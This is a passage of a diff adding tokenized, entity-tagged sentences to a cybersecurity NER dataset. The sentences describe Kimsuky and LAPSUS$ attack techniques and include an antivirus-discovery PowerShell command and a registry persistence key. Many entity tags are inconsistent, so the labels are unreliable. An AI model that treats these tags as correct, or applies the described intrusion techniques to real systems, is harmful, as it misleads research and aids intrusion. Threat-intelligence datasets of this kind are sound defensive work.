"user</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "a", + "tool", + "called", + "GREASE", + "to", + "add", + "a", + "Windows", + "admin", + "account", + "in", + "order", + "to", + "allow", + "them", + "continued", + "access", + "via", + "RDP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "staged", + "collected", + "data", + "files", + "under", + "<code>C:\\Program", + "Files\\Common", + "Files\\System\\Ole", + "DB\\</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "e-mail", + "to", + "send", + "exfiltrated", + "data", + "to", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "attempted", + "to", + "lure", + "victims", + "into", + "opening", + "malicious", + "e-mail", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "lured", + "victims", + "into", + "clicking", + "malicious", + "links." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "developed", + "its", + "own", + "unique", + "malware", + "such", + "as", + "MailFetch.py", + "for", + "use", + "in", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "disguised", + "services", + "to", + "appear", + "as", + "benign", + "software", + "or", + "related", + "to", + "operating", + "system", + "functions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "renamed", + "malware", + "to", + "legitimate", + "names", + "such", + "as", + "<code>ESTCommon.dll</code>", + "or", + "<code>patch.dll</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "modified", + "Registry", + "settings", + "for", + "default", + "file", + "associations", + "to", + "enable", + "all", + "macros", + "and", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "mshta.exe", + "to", + "run", + "malicious", + "scripts", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "a", + "proprietary", + "tool", + "to", + "intercept", + "one", + "time", + "passwords", + "required", + "for", + "two-factor", + "authentication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "the", + "Nirsoft", + "SniffPass", + "network", + "sniffer", + "to", + "obtain", + "passwords", + "sent", + "over", + "non-secure", + "protocols." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "obfuscated", + "binary", + "strings", + "including", + "the", + "use", + "of", + "XOR", + "encryption", + "and", + "Base64", + "encoding.", + "Kimsuky", + "has", + "also", + "modified", + "the", + "first", + "byte", + "of", + "DLL", + "implants", + "targeting", + "victims", + "to", + "prevent", + "recognition", + "of", + "the", + "executable", + "file", + "format." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "pass", + "the", + "hash", + "for", + "authentication", + "to", + "remote", + "access", + "software", + "used", + "in", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "executed", + "a", + "variety", + "of", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Kimsuky", + "can", + "gather", + "a", + "list", + "of", + "all", + "processes", + "running", + "on", + "a", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "a", + "file", + "injector", + "DLL", + "to", + "spawn", + "a", + "benign", + "process", + "on", + "the", + "victim's", + "system", + "and", + "inject", + "the", + "malicious", + "payload", + "into", + "it", + "via", + "process", + "hollowing." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "Win7Elevate", + "to", + "inject", + "malicious", + "code", + "into", + "explorer.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "a", + "macOS", + "Python", + "implant", + "to", + "gather", + "data", + "as", + "well", + "as", + "MailFetcher.py", + "code", + "to", + "automatically", + "collect", + "email", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "obtained", + "specific", + "Registry", + "keys", + "and", + "values", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "placed", + "scripts", + "in", + "the", + "startup", + "folder", + "for", + "persistence", + "and", + "modified", + "the", + "`HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce`", + "Registry", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "executed", + "malware", + "with", + "<code>regsvr32s</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "a", + "modified", + "TeamViewer", + "client", + "as", + "a", + "command", + "and", + "control", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "RDP", + "for", + "direct", + "remote", + "point-and-click", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "tools", + "such", + "as", + "the", + "MailFetch", + "mail", + "crawler", + "to", + "collect", + "victim", + "emails", + "(excluding", + "spam)", + "from", + "online", + "services", + "via", + "IMAP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "`rundll32.exe`", + "to", + "execute", + "malicious", + "scripts", + "and", + "malware", + "on", + "a", + "victim's", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "downloaded", + "additional", + "malware", + "with", + "scheduled", + "tasks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "searched", + "for", + "vulnerabilities,", + "tools,", + "and", + "geopolitical", + "trends", + "on", + "Google", + "to", + "target", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "searched", + "for", + "information", + "on", + "the", + "target", + "company's", + "website." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "checked", + "for", + "the", + "presence", + "of", + "antivirus", + "software", + "with", + "<code>powershell", + "Get-CimInstance", + "-Namespace", + "root/securityCenter2", + "–", + "classname", + "antivirusproduct</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "purchased", + "hosting", + "servers", + "with", + "virtual", + "currency", + "and", + "prepaid", + "cards." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "Twitter", + "to", + "monitor", + "potential", + "victims", + "and", + "to", + "prepare", + "targeted", + "phishing", + "e-mails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "created", + "social", + "media", + "accounts", + "to", + "monitor", + "news", + "and", + "security", + "trends", + "as", + "well", + "as", + "potential", + "targets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "packed", + "malware", + "with", + "UPX." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "emails", + "containing", + "Word,", + "Excel", + "and/or", + "HWP", + "(Hangul", + "Word", + "Processor)", + "documents", + "in", + "their", + "spearphishing", + "campaigns." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "sent", + "spearphishing", + "emails", + "containing", + "a", + "link", + "to", + "a", + "document", + "that", + "contained", + "malicious", + "macros", + "or", + "took", + "the", + "victim", + "to", + "an", + "actor-controlled", + "domain." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "links", + "in", + "e-mail", + "to", + "steal", + "account", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "enumerated", + "drives,", + "OS", + "type,", + "OS", + "version,", + "and", + "other", + "information", + "using", + "a", + "script", + "or", + "the", + "\"systeminfo\"", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "`ipconfig/all`", + "to", + "gather", + "network", + "configuration", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "an", + "instrumentor", + "script", + "to", + "gather", + "the", + "names", + "of", + "all", + "services", + "running", + "on", + "a", + "victim's", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "manipulated", + "timestamps", + "for", + "creation", + "or", + "compilation", + "dates", + "to", + "defeat", + "anti-forensics." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "Nirsoft", + "WebBrowserPassVIew,", + "Mimikatz,", + "and", + "PsExec." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "Blogspot", + "to", + "host", + "malicious", + "content", + "such", + "as", + "beacons,", + "file", + "exfiltrators,", + "and", + "implants." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "Visual", + "Basic", + "to", + "download", + "malicious", + "payloads.", + "Kimsuky", + "has", + "also", + "used", + "malicious", + "VBA", + "macros", + "within", + "maldocs", + "disguised", + "as", + "forms", + "that", + "trigger", + "when", + "a", + "victim", + "types", + "any", + "content", + "into", + "the", + "lure." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "B-Purp", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "HTTP", + "GET", + "and", + "POST", + "requests", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "hosted", + "content", + "used", + "for", + "targeting", + "efforts", + "via", + "web", + "services", + "such", + "as", + "Blogspot." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "used", + "modified", + "versions", + "of", + "open", + "source", + "PHP", + "web", + "shells", + "to", + "maintain", + "access,", + "often", + "adding", + "\"Dinosaur\"", + "references", + "within", + "the", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "executed", + "Windows", + "commands", + "by", + "using", + "`cmd`", + "and", + "running", + "batch", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kimsuky", + "has", + "created", + "new", + "services", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "removed", + "a", + "targeted", + "organization's", + "global", + "admin", + "accounts", + "to", + "lock", + "the", + "organization", + "out", + "of", + "all", + "access." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "added", + "the", + "global", + "admin", + "role", + "to", + "accounts", + "they", + "have", + "created", + "in", + "the", + "targeted", + "organization's", + "cloud", + "instances." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "gathered", + "detailed", + "knowledge", + "of", + "an", + "organization's", + "supply", + "chain", + "relationships." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "targeted", + "various", + "collaboration", + "tools", + "like", + "Slack,", + "Teams,", + "JIRA,", + "Confluence,", + "and", + "others", + "to", + "hunt", + "for", + "exposed", + "credentials", + "to", + "support", + "privilege", + "escalation", + "and", + "lateral", + "movement." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "created", + "global", + "admin", + "accounts", + "in", + "the", + "targeted", + "organization's", + "cloud", + "instances", + "to", + "gain", + "persistence." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "used", + "compromised", + "credentials", + "to", + "access", + "cloud", + "assets", + "within", + "a", + "target", + "organization." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "searched", + "public", + "code", + "repositories", + "for", + "exposed", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "searched", + "a", + "victim's", + "network", + "for", + "code", + "repositories", + "like", + "GitLab", + "and", + "GitHub", + "to", + "discover", + "further", + "high-privilege", + "account", + "credentials." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "searched", + "a", + "victim's", + "network", + "for", + "collaboration", + "platforms", + "like", + "Confluence", + "and", + "JIRA", + "to", + "discover", + "further", + "high-privilege", + "account", + "credentials." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "created", + "new", + "virtual", + "machines", + "within", + "the", + "target's", + "cloud", + "environment", + "after", + "leveraging", + "credential", + "access", + "to", + "cloud", + "assets." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "gathered", + "user", + "identities", + "and", + "credentials", + "to", + "gain", + "initial", + "access", + "to", + "a", + "victim's", + "organization;", + "the", + "group", + "has", + "also", + "called", + "an", + "organization's", + "help", + "desk", + "to", + "reset", + "a", + "target's", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "obtained", + "passwords", + "and", + "session", + "tokens", + "with", + "the", + "use", + "of", + "the", + "Redline", + "password", + "stealer." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "used", + "DCSync", + "attacks", + "to", + "gather", + "credentials", + "for", + "privilege", + "escalation", + "routines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "reconfigured", + "a", + "victim's", + "DNS", + "records", + "to", + "actor-controlled", + "domains", + "and", + "websites." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "deleted", + "the", + "target's", + "systems", + "and", + "resources", + "both", + "on-premises", + "and", + "in", + "the", + "cloud." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "searched", + "a", + "victim's", + "network", + "for", + "organization", + "collaboration", + "channels", + "like", + "MS", + "Teams", + "or", + "Slack", + "to", + "discover", + "further", + "high-privilege", + "account", + "credentials." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "uploaded", + "sensitive", + "files,", + "information,", + "and", + "credentials", + "from", + "a", + "targeted", + "organization", + "for", + "extortion", + "or", + "public", + "release." + ], + "ner_tags": [ + "B-SamFile", + "B-Way", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "deleted", + "the", + "target's", + "systems", + "and", + "resources", + "in", + "the", + "cloud", + "to", + "trigger", + "the", + "organization's", + "incident", + "and", + "crisis", + "response", + "process." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "used", + "the", + "AD", + "Explorer", + "tool", + "to", + "enumerate", + "users", + "on", + "a", + "victim's", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "used", + "the", + "AD", + "Explorer", + "tool", + "to", + "enumerate", + "groups", + "on", + "a", + "victim's", + "network." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "payed", + "employees,", + "suppliers,", + "and", + "business", + "partners", + "of", + "target", + "organizations", + "for", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "B-Org", + "O", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "gathered", + "employee", + "email", + "addresses,", + "including", + "personal", + "accounts,", + "for", + "social", + "engineering", + "and", + "initial", + "access", + "efforts." + ], + "ner_tags": [ + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "set", + "an", + "Office", + "365", + "tenant", + "level", + "mail", + "transport", + "rule", + "to", + "send", + "all", + "mail", + "in", + "and", + "out", + "of", + "the", + "targeted", + "organization", + "to", + "the", + "newly", + "created", + "account." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "exploited", + "unpatched", + "vulnerabilities", + "on", + "internally", + "accessible", + "servers", + "including", + "JIRA,", + "GitLab,", + "and", + "Confluence", + "for", + "privilege", + "escalation." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "gained", + "access", + "to", + "internet-facing", + "systems", + "and", + "applications,", + "including", + "virtual", + "private", + "network", + "(VPN),", + "remote", + "desktop", + "protocol", + "(RDP),", + "and", + "virtual", + "desktop", + "infrastructure", + "(VDI)", + "including", + "Citrix." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "gathered", + "detailed", + "information", + "of", + "target", + "employees", + "to", + "enhance", + "their", + "social", + "engineering", + "lures." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "gathered", + "detailed", + "knowledge", + "of", + "team", + "structures", + "within", + "a", + "target", + "organization." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "called", + "victims'", + "help", + "desk", + "and", + "impersonated", + "legitimate", + "users", + "with", + "previously", + "gathered", + "information", + "in", + "order", + "to", + "gain", + "access", + "to", + "privileged", + "accounts." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "acquired", + "and", + "used", + "the", + "Redline", + "password", + "stealer", + "in", + "their", + "operations." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "replayed", + "stolen", + "session", + "token", + "and", + "passwords", + "to", + "trigger", + "simple-approval", + "MFA", + "prompts", + "in", + "hope", + "of", + "the", + "legitimate", + "user", + "will", + "grant", + "necessary", + "approval." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "spammed", + "target", + "users", + "with", + "MFA", + "prompts", + "in", + "the", + "hope", + "that", + "the", + "legitimate", + "user", + "will", + "grant", + "necessary", + "approval." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "used", + "Windows", + "built-in", + "tool", + "`ntdsutil`", + "to", + "extract", + "the", + "Active", + "Directory", + "(AD)", + "database." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LAPSUS$", + "has", + "accessed", + "local", + "password", + "managers", + "and", + "databases", + "to", + "obtain", + "further", + "credentials", + "from", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + 